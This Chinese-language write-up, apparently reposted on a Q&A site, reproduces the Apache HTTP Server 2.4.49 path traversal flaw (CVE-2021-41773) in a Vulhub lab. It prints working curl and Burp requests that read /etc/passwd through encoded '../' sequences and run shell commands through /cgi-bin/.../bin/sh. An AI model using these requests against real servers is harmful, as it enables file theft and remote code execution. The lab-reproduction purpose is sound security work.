已解决
【漏洞复现】Apache_HTTP_2.4.49_路径穿越漏洞(CVE-2021-41773)
来自网友在路上 161861提问 提问时间:2023-11-07 22:08:33阅读次数: 61
最佳答案 问答题库618位专家为你答疑解惑
感谢互联网提供分享知识与智慧,在法治的社会里,请遵守有关法律法规
文章目录
- 1.1、漏洞描述
- 1.2、漏洞等级
- 1.3、影响版本
- 1.4、漏洞复现
- 1、基础环境
- 2、漏洞验证
- 方式一 curl
- 方式二 bp抓包
1.1、漏洞描述
Apache HTTP服务器项目致力于为现代操作系统(包括UNIX和Windows)开发和维护开源HTTP服务器。
在Apache HTTP Server 2.4.49中对路径规范化所做的更改中发现了一个缺陷。攻击者可以使用路径遍历攻击将URL映射到预期文档根目录之外的文件。
如果这些目录之外的文件不受通常的默认配置“要求全部拒绝”的保护,则这些请求可以成功。如果CGI脚本也为这些别名路径启用,则可以允许远程代码执行。
1.2、漏洞等级
高危
1.3、影响版本
Apache HTTP Server 2.4.49
1.4、漏洞复现
1、基础环境
Path:Vulhub/httpd/CVE-2021-41773
启动测试环境:
sudo docker-compose build
sudo docker-compose up -d
访问http://your-ip:8080/即可看到
2、漏洞验证
方式一 curl
/icons/必须是现有目录
curl -v --path-as-is http://192.168.80.141:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
在服务器上启用mods cgi或cgid后,此路径遍历漏洞将允许执行任意命令
curl -v --data "echo;id" 'http://192.168.80.141:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'
方式二 bp抓包
/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh
echo;id
查看全文
99%的人还看了
相似问题
猜你感兴趣
版权申明
本文"【漏洞复现】Apache_HTTP_2.4.49_路径穿越漏洞(CVE-2021-41773)":http://eshow365.cn/6-34771-0.html 内容来自互联网,请自行判断内容的正确性。如有侵权请联系我们,立即删除!
- 上一篇: 第12章 Java Map集合
- 下一篇: 算法通关村第六关|白银|二叉树的层次遍历【持续更新】